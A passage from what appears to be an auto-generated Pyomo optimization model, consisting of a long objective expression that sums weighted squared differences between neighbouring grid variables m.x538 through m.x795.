m.x565 - 8.11690209768664*m.x538)**2 + (1.3*m.x539 - 1.3*m.x538)**2) + 2.3733844381995*((
8.11690209768664*m.x566 - 8.11690209768664*m.x539)**2 + (1.3*m.x540 - 1.3*m.x539)**2) +
2.31602462576011*((8.11690209768664*m.x568 - 8.11690209768664*m.x541)**2 + (1.3*m.x542 - 1.3*
m.x541)**2) + 2.31602462576011*((8.11690209768664*m.x569 - 8.11690209768664*m.x542)**2 + (1.3*
m.x543 - 1.3*m.x542)**2) + 2.31602462576011*((8.11690209768664*m.x570 - 8.11690209768664*m.x543)
**2 + (1.3*m.x544 - 1.3*m.x543)**2) + 2.31602462576011*((8.11690209768664*m.x571 -
8.11690209768664*m.x544)**2 + (1.3*m.x545 - 1.3*m.x544)**2) + 2.31602462576011*((8.11690209768664
*m.x572 - 8.11690209768664*m.x545)**2 + (1.3*m.x546 - 1.3*m.x545)**2) + 2.31602462576011*((
8.11690209768664*m.x573 - 8.11690209768664*m.x546)**2 + (1.3*m.x547 - 1.3*m.x546)**2) +
2.31602462576011*((8.11690209768664*m.x574 - 8.11690209768664*m.x547)**2 + (1.3*m.x548 - 1.3*
m.x547)**2) + 2.31602462576011*((8.11690209768664*m.x575 - 8.11690209768664*m.x548)**2 + (1.3*
m.x549 - 1.3*m.x548)**2) + 2.31602462576011*((8.11690209768664*m.x576 - 8.11690209768664*m.x549)
**2 + (1.3*m.x550 - 1.3*m.x549)**2) + 2.31602462576011*((8.11690209768664*m.x577 -
8.11690209768664*m.x550)**2 + (1.3*m.x551 - 1.3*m.x550)**2) + 2.31602462576011*((8.11690209768664
*m.x578 - 8.11690209768664*m.x551)**2 + (1.3*m.x552 - 1.3*m.x551)**2) + 2.31602462576011*((
8.11690209768664*m.x579 - 8.11690209768664*m.x552)**2 + (1.3*m.x553 - 1.3*m.x552)**2) +
2.31602462576011*((8.11690209768664*m.x580 - 8.11690209768664*m.x553)**2 + (1.3*m.x554 - 1.3*
m.x553)**2) + 2.31602462576011*((8.11690209768664*m.x581 - 8.11690209768664*m.x554)**2 + (1.3*
m.x555 - 1.3*m.x554)**2) + 2.31602462576011*((8.11690209768664*m.x582 - 8.11690209768664*m.x555)
**2 + (1.3*m.x556 - 1.3*m.x555)**2) + 2.31602462576011*((8.11690209768664*m.x583 -
8.11690209768664*m.x556)**2 + (1.3*m.x557 - 1.3*m.x556)**2) + 2.31602462576011*((8.11690209768664
*m.x584 - 8.11690209768664*m.x557)**2 + (1.3*m.x558 - 1.3*m.x557)**2) + 2.31602462576011*((
8.11690209768664*m.x585 - 8.11690209768664*m.x558)**2 + (1.3*m.x559 - 1.3*m.x558)**2) +
2.31602462576011*((8.11690209768664*m.x586 - 8.11690209768664*m.x559)**2 + (1.3*m.x560 - 1.3*
m.x559)**2) + 2.31602462576011*((8.11690209768664*m.x587 - 8.11690209768664*m.x560)**2 + (1.3*
m.x561 - 1.3*m.x560)**2) + 2.31602462576011*((8.11690209768664*m.x588 - 8.11690209768664*m.x561)
**2 + (1.3*m.x562 - 1.3*m.x561)**2) + 2.31602462576011*((8.11690209768664*m.x589 -
8.11690209768664*m.x562)**2 + (1.3*m.x563 - 1.3*m.x562)**2) + 2.31602462576011*((8.11690209768664
*m.x590 - 8.11690209768664*m.x563)**2 + (1.3*m.x564 - 1.3*m.x563)**2) + 2.31602462576011*((
8.11690209768664*m.x591 - 8.11690209768664*m.x564)**2 + (1.3*m.x565 - 1.3*m.x564)**2) +
2.31602462576011*((8.11690209768664*m.x592 - 8.11690209768664*m.x565)**2 + (1.3*m.x566 - 1.3*
m.x565)**2) + 2.31602462576011*((8.11690209768664*m.x593 - 8.11690209768664*m.x566)**2 + (1.3*
m.x567 - 1.3*m.x566)**2) + 2.26894619536748*((8.11690209768664*m.x595 - 8.11690209768664*m.x568)
**2 + (1.3*m.x569 - 1.3*m.x568)**2) + 2.26894619536748*((8.11690209768664*m.x596 -
8.11690209768664*m.x569)**2 + (1.3*m.x570 - 1.3*m.x569)**2) + 2.26894619536748*((8.11690209768664
*m.x597 - 8.11690209768664*m.x570)**2 + (1.3*m.x571 - 1.3*m.x570)**2) + 2.26894619536748*((
8.11690209768664*m.x598 - 8.11690209768664*m.x571)**2 + (1.3*m.x572 - 1.3*m.x571)**2) +
2.26894619536748*((8.11690209768664*m.x599 - 8.11690209768664*m.x572)**2 + (1.3*m.x573 - 1.3*
m.x572)**2) + 2.26894619536748*((8.11690209768664*m.x600 - 8.11690209768664*m.x573)**2 + (1.3*
m.x574 - 1.3*m.x573)**2) + 2.26894619536748*((8.11690209768664*m.x601 - 8.11690209768664*m.x574)
**2 + (1.3*m.x575 - 1.3*m.x574)**2) + 2.26894619536748*((8.11690209768664*m.x602 -
8.11690209768664*m.x575)**2 + (1.3*m.x576 - 1.3*m.x575)**2) + 2.26894619536748*((8.11690209768664
*m.x603 - 8.11690209768664*m.x576)**2 + (1.3*m.x577 - 1.3*m.x576)**2) + 2.26894619536748*((
8.11690209768664*m.x604 - 8.11690209768664*m.x577)**2 + (1.3*m.x578 - 1.3*m.x577)**2) +
2.26894619536748*((8.11690209768664*m.x605 - 8.11690209768664*m.x578)**2 + (1.3*m.x579 - 1.3*
m.x578)**2) + 2.26894619536748*((8.11690209768664*m.x606 - 8.11690209768664*m.x579)**2 + (1.3*
m.x580 - 1.3*m.x579)**2) + 2.26894619536748*((8.11690209768664*m.x607 - 8.11690209768664*m.x580)
**2 + (1.3*m.x581 - 1.3*m.x580)**2) + 2.26894619536748*((8.11690209768664*m.x608 -
8.11690209768664*m.x581)**2 + (1.3*m.x582 - 1.3*m.x581)**2) + 2.26894619536748*((8.11690209768664
*m.x609 - 8.11690209768664*m.x582)**2 + (1.3*m.x583 - 1.3*m.x582)**2) + 2.26894619536748*((
8.11690209768664*m.x610 - 8.11690209768664*m.x583)**2 + (1.3*m.x584 - 1.3*m.x583)**2) +
2.26894619536748*((8.11690209768664*m.x611 - 8.11690209768664*m.x584)**2 + (1.3*m.x585 - 1.3*
m.x584)**2) + 2.26894619536748*((8.11690209768664*m.x612 - 8.11690209768664*m.x585)**2 + (1.3*
m.x586 - 1.3*m.x585)**2) + 2.26894619536748*((8.11690209768664*m.x613 - 8.11690209768664*m.x586)
**2 + (1.3*m.x587 - 1.3*m.x586)**2) + 2.26894619536748*((8.11690209768664*m.x614 -
8.11690209768664*m.x587)**2 + (1.3*m.x588 - 1.3*m.x587)**2) + 2.26894619536748*((8.11690209768664
*m.x615 - 8.11690209768664*m.x588)**2 + (1.3*m.x589 - 1.3*m.x588)**2) + 2.26894619536748*((
8.11690209768664*m.x616 - 8.11690209768664*m.x589)**2 + (1.3*m.x590 - 1.3*m.x589)**2) +
2.26894619536748*((8.11690209768664*m.x617 - 8.11690209768664*m.x590)**2 + (1.3*m.x591 - 1.3*
m.x590)**2) + 2.26894619536748*((8.11690209768664*m.x618 - 8.11690209768664*m.x591)**2 + (1.3*
m.x592 - 1.3*m.x591)**2) + 2.26894619536748*((8.11690209768664*m.x619 - 8.11690209768664*m.x592)
**2 + (1.3*m.x593 - 1.3*m.x592)**2) + 2.26894619536748*((8.11690209768664*m.x620 -
8.11690209768664*m.x593)**2 + (1.3*m.x594 - 1.3*m.x593)**2) + 2.23245990505138*((8.11690209768664
*m.x622 - 8.11690209768664*m.x595)**2 + (1.3*m.x596 - 1.3*m.x595)**2) + 2.23245990505138*((
8.11690209768664*m.x623 - 8.11690209768664*m.x596)**2 + (1.3*m.x597 - 1.3*m.x596)**2) +
2.23245990505138*((8.11690209768664*m.x624 - 8.11690209768664*m.x597)**2 + (1.3*m.x598 - 1.3*
m.x597)**2) + 2.23245990505138*((8.11690209768664*m.x625 - 8.11690209768664*m.x598)**2 + (1.3*
m.x599 - 1.3*m.x598)**2) + 2.23245990505138*((8.11690209768664*m.x626 - 8.11690209768664*m.x599)
**2 + (1.3*m.x600 - 1.3*m.x599)**2) + 2.23245990505138*((8.11690209768664*m.x627 -
8.11690209768664*m.x600)**2 + (1.3*m.x601 - 1.3*m.x600)**2) + 2.23245990505138*((8.11690209768664
*m.x628 - 8.11690209768664*m.x601)**2 + (1.3*m.x602 - 1.3*m.x601)**2) + 2.23245990505138*((
8.11690209768664*m.x629 - 8.11690209768664*m.x602)**2 + (1.3*m.x603 - 1.3*m.x602)**2) +
2.23245990505138*((8.11690209768664*m.x630 - 8.11690209768664*m.x603)**2 + (1.3*m.x604 - 1.3*
m.x603)**2) + 2.23245990505138*((8.11690209768664*m.x631 - 8.11690209768664*m.x604)**2 + (1.3*
m.x605 - 1.3*m.x604)**2) + 2.23245990505138*((8.11690209768664*m.x632 - 8.11690209768664*m.x605)
**2 + (1.3*m.x606 - 1.3*m.x605)**2) + 2.23245990505138*((8.11690209768664*m.x633 -
8.11690209768664*m.x606)**2 + (1.3*m.x607 - 1.3*m.x606)**2) + 2.23245990505138*((8.11690209768664
*m.x634 - 8.11690209768664*m.x607)**2 + (1.3*m.x608 - 1.3*m.x607)**2) + 2.23245990505138*((
8.11690209768664*m.x635 - 8.11690209768664*m.x608)**2 + (1.3*m.x609 - 1.3*m.x608)**2) +
2.23245990505138*((8.11690209768664*m.x636 - 8.11690209768664*m.x609)**2 + (1.3*m.x610 - 1.3*
m.x609)**2) + 2.23245990505138*((8.11690209768664*m.x637 - 8.11690209768664*m.x610)**2 + (1.3*
m.x611 - 1.3*m.x610)**2) + 2.23245990505138*((8.11690209768664*m.x638 - 8.11690209768664*m.x611)
**2 + (1.3*m.x612 - 1.3*m.x611)**2) + 2.23245990505138*((8.11690209768664*m.x639 -
8.11690209768664*m.x612)**2 + (1.3*m.x613 - 1.3*m.x612)**2) + 2.23245990505138*((8.11690209768664
*m.x640 - 8.11690209768664*m.x613)**2 + (1.3*m.x614 - 1.3*m.x613)**2) + 2.23245990505138*((
8.11690209768664*m.x641 - 8.11690209768664*m.x614)**2 + (1.3*m.x615 - 1.3*m.x614)**2) +
2.23245990505138*((8.11690209768664*m.x642 - 8.11690209768664*m.x615)**2 + (1.3*m.x616 - 1.3*
m.x615)**2) + 2.23245990505138*((8.11690209768664*m.x643 - 8.11690209768664*m.x616)**2 + (1.3*
m.x617 - 1.3*m.x616)**2) + 2.23245990505138*((8.11690209768664*m.x644 - 8.11690209768664*m.x617)
**2 + (1.3*m.x618 - 1.3*m.x617)**2) + 2.23245990505138*((8.11690209768664*m.x645 -
8.11690209768664*m.x618)**2 + (1.3*m.x619 - 1.3*m.x618)**2) + 2.23245990505138*((8.11690209768664
*m.x646 - 8.11690209768664*m.x619)**2 + (1.3*m.x620 - 1.3*m.x619)**2) + 2.23245990505138*((
8.11690209768664*m.x647 - 8.11690209768664*m.x620)**2 + (1.3*m.x621 - 1.3*m.x620)**2) +
2.20678572725218*((8.11690209768664*m.x649 - 8.11690209768664*m.x622)**2 + (1.3*m.x623 - 1.3*
m.x622)**2) + 2.20678572725218*((8.11690209768664*m.x650 - 8.11690209768664*m.x623)**2 + (1.3*
m.x624 - 1.3*m.x623)**2) + 2.20678572725218*((8.11690209768664*m.x651 - 8.11690209768664*m.x624)
**2 + (1.3*m.x625 - 1.3*m.x624)**2) + 2.20678572725218*((8.11690209768664*m.x652 -
8.11690209768664*m.x625)**2 + (1.3*m.x626 - 1.3*m.x625)**2) + 2.20678572725218*((8.11690209768664
*m.x653 - 8.11690209768664*m.x626)**2 + (1.3*m.x627 - 1.3*m.x626)**2) + 2.20678572725218*((
8.11690209768664*m.x654 - 8.11690209768664*m.x627)**2 + (1.3*m.x628 - 1.3*m.x627)**2) +
2.20678572725218*((8.11690209768664*m.x655 - 8.11690209768664*m.x628)**2 + (1.3*m.x629 - 1.3*
m.x628)**2) + 2.20678572725218*((8.11690209768664*m.x656 - 8.11690209768664*m.x629)**2 + (1.3*
m.x630 - 1.3*m.x629)**2) + 2.20678572725218*((8.11690209768664*m.x657 - 8.11690209768664*m.x630)
**2 + (1.3*m.x631 - 1.3*m.x630)**2) + 2.20678572725218*((8.11690209768664*m.x658 -
8.11690209768664*m.x631)**2 + (1.3*m.x632 - 1.3*m.x631)**2) + 2.20678572725218*((8.11690209768664
*m.x659 - 8.11690209768664*m.x632)**2 + (1.3*m.x633 - 1.3*m.x632)**2) + 2.20678572725218*((
8.11690209768664*m.x660 - 8.11690209768664*m.x633)**2 + (1.3*m.x634 - 1.3*m.x633)**2) +
2.20678572725218*((8.11690209768664*m.x661 - 8.11690209768664*m.x634)**2 + (1.3*m.x635 - 1.3*
m.x634)**2) + 2.20678572725218*((8.11690209768664*m.x662 - 8.11690209768664*m.x635)**2 + (1.3*
m.x636 - 1.3*m.x635)**2) + 2.20678572725218*((8.11690209768664*m.x663 - 8.11690209768664*m.x636)
**2 + (1.3*m.x637 - 1.3*m.x636)**2) + 2.20678572725218*((8.11690209768664*m.x664 -
8.11690209768664*m.x637)**2 + (1.3*m.x638 - 1.3*m.x637)**2) + 2.20678572725218*((8.11690209768664
*m.x665 - 8.11690209768664*m.x638)**2 + (1.3*m.x639 - 1.3*m.x638)**2) + 2.20678572725218*((
8.11690209768664*m.x666 - 8.11690209768664*m.x639)**2 + (1.3*m.x640 - 1.3*m.x639)**2) +
2.20678572725218*((8.11690209768664*m.x667 - 8.11690209768664*m.x640)**2 + (1.3*m.x641 - 1.3*
m.x640)**2) + 2.20678572725218*((8.11690209768664*m.x668 - 8.11690209768664*m.x641)**2 + (1.3*
m.x642 - 1.3*m.x641)**2) + 2.20678572725218*((8.11690209768664*m.x669 - 8.11690209768664*m.x642)
**2 + (1.3*m.x643 - 1.3*m.x642)**2) + 2.20678572725218*((8.11690209768664*m.x670 -
8.11690209768664*m.x643)**2 + (1.3*m.x644 - 1.3*m.x643)**2) + 2.20678572725218*((8.11690209768664
*m.x671 - 8.11690209768664*m.x644)**2 + (1.3*m.x645 - 1.3*m.x644)**2) + 2.20678572725218*((
8.11690209768664*m.x672 - 8.11690209768664*m.x645)**2 + (1.3*m.x646 - 1.3*m.x645)**2) +
2.20678572725218*((8.11690209768664*m.x673 - 8.11690209768664*m.x646)**2 + (1.3*m.x647 - 1.3*
m.x646)**2) + 2.20678572725218*((8.11690209768664*m.x674 - 8.11690209768664*m.x647)**2 + (1.3*
m.x648 - 1.3*m.x647)**2) + 2.19206734593218*((8.11690209768664*m.x676 - 8.11690209768664*m.x649)
**2 + (1.3*m.x650 - 1.3*m.x649)**2) + 2.19206734593218*((8.11690209768664*m.x677 -
8.11690209768664*m.x650)**2 + (1.3*m.x651 - 1.3*m.x650)**2) + 2.19206734593218*((8.11690209768664
*m.x678 - 8.11690209768664*m.x651)**2 + (1.3*m.x652 - 1.3*m.x651)**2) + 2.19206734593218*((
8.11690209768664*m.x679 - 8.11690209768664*m.x652)**2 + (1.3*m.x653 - 1.3*m.x652)**2) +
2.19206734593218*((8.11690209768664*m.x680 - 8.11690209768664*m.x653)**2 + (1.3*m.x654 - 1.3*
m.x653)**2) + 2.19206734593218*((8.11690209768664*m.x681 - 8.11690209768664*m.x654)**2 + (1.3*
m.x655 - 1.3*m.x654)**2) + 2.19206734593218*((8.11690209768664*m.x682 - 8.11690209768664*m.x655)
**2 + (1.3*m.x656 - 1.3*m.x655)**2) + 2.19206734593218*((8.11690209768664*m.x683 -
8.11690209768664*m.x656)**2 + (1.3*m.x657 - 1.3*m.x656)**2) + 2.19206734593218*((8.11690209768664
*m.x684 - 8.11690209768664*m.x657)**2 + (1.3*m.x658 - 1.3*m.x657)**2) + 2.19206734593218*((
8.11690209768664*m.x685 - 8.11690209768664*m.x658)**2 + (1.3*m.x659 - 1.3*m.x658)**2) +
2.19206734593218*((8.11690209768664*m.x686 - 8.11690209768664*m.x659)**2 + (1.3*m.x660 - 1.3*
m.x659)**2) + 2.19206734593218*((8.11690209768664*m.x687 - 8.11690209768664*m.x660)**2 + (1.3*
m.x661 - 1.3*m.x660)**2) + 2.19206734593218*((8.11690209768664*m.x688 - 8.11690209768664*m.x661)
**2 + (1.3*m.x662 - 1.3*m.x661)**2) + 2.19206734593218*((8.11690209768664*m.x689 -
8.11690209768664*m.x662)**2 + (1.3*m.x663 - 1.3*m.x662)**2) + 2.19206734593218*((8.11690209768664
*m.x690 - 8.11690209768664*m.x663)**2 + (1.3*m.x664 - 1.3*m.x663)**2) + 2.19206734593218*((
8.11690209768664*m.x691 - 8.11690209768664*m.x664)**2 + (1.3*m.x665 - 1.3*m.x664)**2) +
2.19206734593218*((8.11690209768664*m.x692 - 8.11690209768664*m.x665)**2 + (1.3*m.x666 - 1.3*
m.x665)**2) + 2.19206734593218*((8.11690209768664*m.x693 - 8.11690209768664*m.x666)**2 + (1.3*
m.x667 - 1.3*m.x666)**2) + 2.19206734593218*((8.11690209768664*m.x694 - 8.11690209768664*m.x667)
**2 + (1.3*m.x668 - 1.3*m.x667)**2) + 2.19206734593218*((8.11690209768664*m.x695 -
8.11690209768664*m.x668)**2 + (1.3*m.x669 - 1.3*m.x668)**2) + 2.19206734593218*((8.11690209768664
*m.x696 - 8.11690209768664*m.x669)**2 + (1.3*m.x670 - 1.3*m.x669)**2) + 2.19206734593218*((
8.11690209768664*m.x697 - 8.11690209768664*m.x670)**2 + (1.3*m.x671 - 1.3*m.x670)**2) +
2.19206734593218*((8.11690209768664*m.x698 - 8.11690209768664*m.x671)**2 + (1.3*m.x672 - 1.3*
m.x671)**2) + 2.19206734593218*((8.11690209768664*m.x699 - 8.11690209768664*m.x672)**2 + (1.3*
m.x673 - 1.3*m.x672)**2) + 2.19206734593218*((8.11690209768664*m.x700 - 8.11690209768664*m.x673)
**2 + (1.3*m.x674 - 1.3*m.x673)**2) + 2.19206734593218*((8.11690209768664*m.x701 -
8.11690209768664*m.x674)**2 + (1.3*m.x675 - 1.3*m.x674)**2) + 2.18838296475748*((8.11690209768664
*m.x703 - 8.11690209768664*m.x676)**2 + (1.3*m.x677 - 1.3*m.x676)**2) + 2.18838296475748*((
8.11690209768664*m.x704 - 8.11690209768664*m.x677)**2 + (1.3*m.x678 - 1.3*m.x677)**2) +
2.18838296475748*((8.11690209768664*m.x705 - 8.11690209768664*m.x678)**2 + (1.3*m.x679 - 1.3*
m.x678)**2) + 2.18838296475748*((8.11690209768664*m.x706 - 8.11690209768664*m.x679)**2 + (1.3*
m.x680 - 1.3*m.x679)**2) + 2.18838296475748*((8.11690209768664*m.x707 - 8.11690209768664*m.x680)
**2 + (1.3*m.x681 - 1.3*m.x680)**2) + 2.18838296475748*((8.11690209768664*m.x708 -
8.11690209768664*m.x681)**2 + (1.3*m.x682 - 1.3*m.x681)**2) + 2.18838296475748*((8.11690209768664
*m.x709 - 8.11690209768664*m.x682)**2 + (1.3*m.x683 - 1.3*m.x682)**2) + 2.18838296475748*((
8.11690209768664*m.x710 - 8.11690209768664*m.x683)**2 + (1.3*m.x684 - 1.3*m.x683)**2) +
2.18838296475748*((8.11690209768664*m.x711 - 8.11690209768664*m.x684)**2 + (1.3*m.x685 - 1.3*
m.x684)**2) + 2.18838296475748*((8.11690209768664*m.x712 - 8.11690209768664*m.x685)**2 + (1.3*
m.x686 - 1.3*m.x685)**2) + 2.18838296475748*((8.11690209768664*m.x713 - 8.11690209768664*m.x686)
**2 + (1.3*m.x687 - 1.3*m.x686)**2) + 2.18838296475748*((8.11690209768664*m.x714 -
8.11690209768664*m.x687)**2 + (1.3*m.x688 - 1.3*m.x687)**2) + 2.18838296475748*((8.11690209768664
*m.x715 - 8.11690209768664*m.x688)**2 + (1.3*m.x689 - 1.3*m.x688)**2) + 2.18838296475748*((
8.11690209768664*m.x716 - 8.11690209768664*m.x689)**2 + (1.3*m.x690 - 1.3*m.x689)**2) +
2.18838296475748*((8.11690209768664*m.x717 - 8.11690209768664*m.x690)**2 + (1.3*m.x691 - 1.3*
m.x690)**2) + 2.18838296475748*((8.11690209768664*m.x718 - 8.11690209768664*m.x691)**2 + (1.3*
m.x692 - 1.3*m.x691)**2) + 2.18838296475748*((8.11690209768664*m.x719 - 8.11690209768664*m.x692)
**2 + (1.3*m.x693 - 1.3*m.x692)**2) + 2.18838296475748*((8.11690209768664*m.x720 -
8.11690209768664*m.x693)**2 + (1.3*m.x694 - 1.3*m.x693)**2) + 2.18838296475748*((8.11690209768664
*m.x721 - 8.11690209768664*m.x694)**2 + (1.3*m.x695 - 1.3*m.x694)**2) + 2.18838296475748*((
8.11690209768664*m.x722 - 8.11690209768664*m.x695)**2 + (1.3*m.x696 - 1.3*m.x695)**2) +
2.18838296475748*((8.11690209768664*m.x723 - 8.11690209768664*m.x696)**2 + (1.3*m.x697 - 1.3*
m.x696)**2) + 2.18838296475748*((8.11690209768664*m.x724 - 8.11690209768664*m.x697)**2 + (1.3*
m.x698 - 1.3*m.x697)**2) + 2.18838296475748*((8.11690209768664*m.x725 - 8.11690209768664*m.x698)
**2 + (1.3*m.x699 - 1.3*m.x698)**2) + 2.18838296475748*((8.11690209768664*m.x726 -
8.11690209768664*m.x699)**2 + (1.3*m.x700 - 1.3*m.x699)**2) + 2.18838296475748*((8.11690209768664
*m.x727 - 8.11690209768664*m.x700)**2 + (1.3*m.x701 - 1.3*m.x700)**2) + 2.18838296475748*((
8.11690209768664*m.x728 - 8.11690209768664*m.x701)**2 + (1.3*m.x702 - 1.3*m.x701)**2) +
2.19575172710689*((8.11690209768664*m.x730 - 8.11690209768664*m.x703)**2 + (1.3*m.x704 - 1.3*
m.x703)**2) + 2.19575172710689*((8.11690209768664*m.x731 - 8.11690209768664*m.x704)**2 + (1.3*
m.x705 - 1.3*m.x704)**2) + 2.19575172710689*((8.11690209768664*m.x732 - 8.11690209768664*m.x705)
**2 + (1.3*m.x706 - 1.3*m.x705)**2) + 2.19575172710689*((8.11690209768664*m.x733 -
8.11690209768664*m.x706)**2 + (1.3*m.x707 - 1.3*m.x706)**2) + 2.19575172710689*((8.11690209768664
*m.x734 - 8.11690209768664*m.x707)**2 + (1.3*m.x708 - 1.3*m.x707)**2) + 2.19575172710689*((
8.11690209768664*m.x735 - 8.11690209768664*m.x708)**2 + (1.3*m.x709 - 1.3*m.x708)**2) +
2.19575172710689*((8.11690209768664*m.x736 - 8.11690209768664*m.x709)**2 + (1.3*m.x710 - 1.3*
m.x709)**2) + 2.19575172710689*((8.11690209768664*m.x737 - 8.11690209768664*m.x710)**2 + (1.3*
m.x711 - 1.3*m.x710)**2) + 2.19575172710689*((8.11690209768664*m.x738 - 8.11690209768664*m.x711)
**2 + (1.3*m.x712 - 1.3*m.x711)**2) + 2.19575172710689*((8.11690209768664*m.x739 -
8.11690209768664*m.x712)**2 + (1.3*m.x713 - 1.3*m.x712)**2) + 2.19575172710689*((8.11690209768664
*m.x740 - 8.11690209768664*m.x713)**2 + (1.3*m.x714 - 1.3*m.x713)**2) + 2.19575172710689*((
8.11690209768664*m.x741 - 8.11690209768664*m.x714)**2 + (1.3*m.x715 - 1.3*m.x714)**2) +
2.19575172710689*((8.11690209768664*m.x742 - 8.11690209768664*m.x715)**2 + (1.3*m.x716 - 1.3*
m.x715)**2) + 2.19575172710689*((8.11690209768664*m.x743 - 8.11690209768664*m.x716)**2 + (1.3*
m.x717 - 1.3*m.x716)**2) + 2.19575172710689*((8.11690209768664*m.x744 - 8.11690209768664*m.x717)
**2 + (1.3*m.x718 - 1.3*m.x717)**2) + 2.19575172710689*((8.11690209768664*m.x745 -
8.11690209768664*m.x718)**2 + (1.3*m.x719 - 1.3*m.x718)**2) + 2.19575172710689*((8.11690209768664
*m.x746 - 8.11690209768664*m.x719)**2 + (1.3*m.x720 - 1.3*m.x719)**2) + 2.19575172710689*((
8.11690209768664*m.x747 - 8.11690209768664*m.x720)**2 + (1.3*m.x721 - 1.3*m.x720)**2) +
2.19575172710689*((8.11690209768664*m.x748 - 8.11690209768664*m.x721)**2 + (1.3*m.x722 - 1.3*
m.x721)**2) + 2.19575172710689*((8.11690209768664*m.x749 - 8.11690209768664*m.x722)**2 + (1.3*
m.x723 - 1.3*m.x722)**2) + 2.19575172710689*((8.11690209768664*m.x750 - 8.11690209768664*m.x723)
**2 + (1.3*m.x724 - 1.3*m.x723)**2) + 2.19575172710689*((8.11690209768664*m.x751 -
8.11690209768664*m.x724)**2 + (1.3*m.x725 - 1.3*m.x724)**2) + 2.19575172710689*((8.11690209768664
*m.x752 - 8.11690209768664*m.x725)**2 + (1.3*m.x726 - 1.3*m.x725)**2) + 2.19575172710689*((
8.11690209768664*m.x753 - 8.11690209768664*m.x726)**2 + (1.3*m.x727 - 1.3*m.x726)**2) +
2.19575172710689*((8.11690209768664*m.x754 - 8.11690209768664*m.x727)**2 + (1.3*m.x728 - 1.3*
m.x727)**2) + 2.19575172710689*((8.11690209768664*m.x755 - 8.11690209768664*m.x728)**2 + (1.3*
m.x729 - 1.3*m.x728)**2) + 2.21413534622276*((8.11690209768664*m.x757 - 8.11690209768664*m.x730)
**2 + (1.3*m.x731 - 1.3*m.x730)**2) + 2.21413534622276*((8.11690209768664*m.x758 -
8.11690209768664*m.x731)**2 + (1.3*m.x732 - 1.3*m.x731)**2) + 2.21413534622276*((8.11690209768664
*m.x759 - 8.11690209768664*m.x732)**2 + (1.3*m.x733 - 1.3*m.x732)**2) + 2.21413534622276*((
8.11690209768664*m.x760 - 8.11690209768664*m.x733)**2 + (1.3*m.x734 - 1.3*m.x733)**2) +
2.21413534622276*((8.11690209768664*m.x761 - 8.11690209768664*m.x734)**2 + (1.3*m.x735 - 1.3*
m.x734)**2) + 2.21413534622276*((8.11690209768664*m.x762 - 8.11690209768664*m.x735)**2 + (1.3*
m.x736 - 1.3*m.x735)**2) + 2.21413534622276*((8.11690209768664*m.x763 - 8.11690209768664*m.x736)
**2 + (1.3*m.x737 - 1.3*m.x736)**2) + 2.21413534622276*((8.11690209768664*m.x764 -
8.11690209768664*m.x737)**2 + (1.3*m.x738 - 1.3*m.x737)**2) + 2.21413534622276*((8.11690209768664
*m.x765 - 8.11690209768664*m.x738)**2 + (1.3*m.x739 - 1.3*m.x738)**2) + 2.21413534622276*((
8.11690209768664*m.x766 - 8.11690209768664*m.x739)**2 + (1.3*m.x740 - 1.3*m.x739)**2) +
2.21413534622276*((8.11690209768664*m.x767 - 8.11690209768664*m.x740)**2 + (1.3*m.x741 - 1.3*
m.x740)**2) + 2.21413534622276*((8.11690209768664*m.x768 - 8.11690209768664*m.x741)**2 + (1.3*
m.x742 - 1.3*m.x741)**2) + 2.21413534622276*((8.11690209768664*m.x769 - 8.11690209768664*m.x742)
**2 + (1.3*m.x743 - 1.3*m.x742)**2) + 2.21413534622276*((8.11690209768664*m.x770 -
8.11690209768664*m.x743)**2 + (1.3*m.x744 - 1.3*m.x743)**2) + 2.21413534622276*((8.11690209768664
*m.x771 - 8.11690209768664*m.x744)**2 + (1.3*m.x745 - 1.3*m.x744)**2) + 2.21413534622276*((
8.11690209768664*m.x772 - 8.11690209768664*m.x745)**2 + (1.3*m.x746 - 1.3*m.x745)**2) +
2.21413534622276*((8.11690209768664*m.x773 - 8.11690209768664*m.x746)**2 + (1.3*m.x747 - 1.3*
m.x746)**2) + 2.21413534622276*((8.11690209768664*m.x774 - 8.11690209768664*m.x747)**2 + (1.3*
m.x748 - 1.3*m.x747)**2) + 2.21413534622276*((8.11690209768664*m.x775 - 8.11690209768664*m.x748)
**2 + (1.3*m.x749 - 1.3*m.x748)**2) + 2.21413534622276*((8.11690209768664*m.x776 -
8.11690209768664*m.x749)**2 + (1.3*m.x750 - 1.3*m.x749)**2) + 2.21413534622276*((8.11690209768664
*m.x777 - 8.11690209768664*m.x750)**2 + (1.3*m.x751 - 1.3*m.x750)**2) + 2.21413534622276*((
8.11690209768664*m.x778 - 8.11690209768664*m.x751)**2 + (1.3*m.x752 - 1.3*m.x751)**2) +
2.21413534622276*((8.11690209768664*m.x779 - 8.11690209768664*m.x752)**2 + (1.3*m.x753 - 1.3*
m.x752)**2) + 2.21413534622276*((8.11690209768664*m.x780 - 8.11690209768664*m.x753)**2 + (1.3*
m.x754 - 1.3*m.x753)**2) + 2.21413534622276*((8.11690209768664*m.x781 - 8.11690209768664*m.x754)
**2 + (1.3*m.x755 - 1.3*m.x754)**2) + 2.21413534622276*((8.11690209768664*m.x782 -
8.11690209768664*m.x755)**2 + (1.3*m.x756 - 1.3*m.x755)**2) + 2.24343484490943*((8.11690209768664
*m.x784 - 8.11690209768664*m.x757)**2 + (1.3*m.x758 - 1.3*m.x757)**2) + 2.24343484490943*((
8.11690209768664*m.x785 - 8.11690209768664*m.x758)**2 + (1.3*m.x759 - 1.3*m.x758)**2) +
2.24343484490943*((8.11690209768664*m.x786 - 8.11690209768664*m.x759)**2 + (1.3*m.x760 - 1.3*
m.x759)**2) + 2.24343484490943*((8.11690209768664*m.x787 - 8.11690209768664*m.x760)**2 + (1.3*
m.x761 - 1.3*m.x760)**2) + 2.24343484490943*((8.11690209768664*m.x788 - 8.11690209768664*m.x761)
**2 + (1.3*m.x762 - 1.3*m.x761)**2) + 2.24343484490943*((8.11690209768664*m.x789 -
8.11690209768664*m.x762)**2 + (1.3*m.x763 - 1.3*m.x762)**2) + 2.24343484490943*((8.11690209768664
*m.x790 - 8.11690209768664*m.x763)**2 + (1.3*m.x764 - 1.3*m.x763)**2) + 2.24343484490943*((
8.11690209768664*m.x791 - 8.11690209768664*m.x764)**2 + (1.3*m.x765 - 1.3*m.x764)**2) +
2.24343484490943*((8.11690209768664*m.x792 - 8.11690209768664*m.x765)**2 + (1.3*m.x766 - 1.3*
m.x765)**2) + 2.24343484490943*((8.11690209768664*m.x793 - 8.11690209768664*m.x766)**2 + (1.3*
m.x767 - 1.3*m.x766)**2) + 2.24343484490943*((8.11690209768664*m.x794 - 8.11690209768664*m.x767)
**2 + (1.3*m.x768 - 1.3*m.x767)**2) + 2.24343484490943*((8.11690209768664*m.x795 -
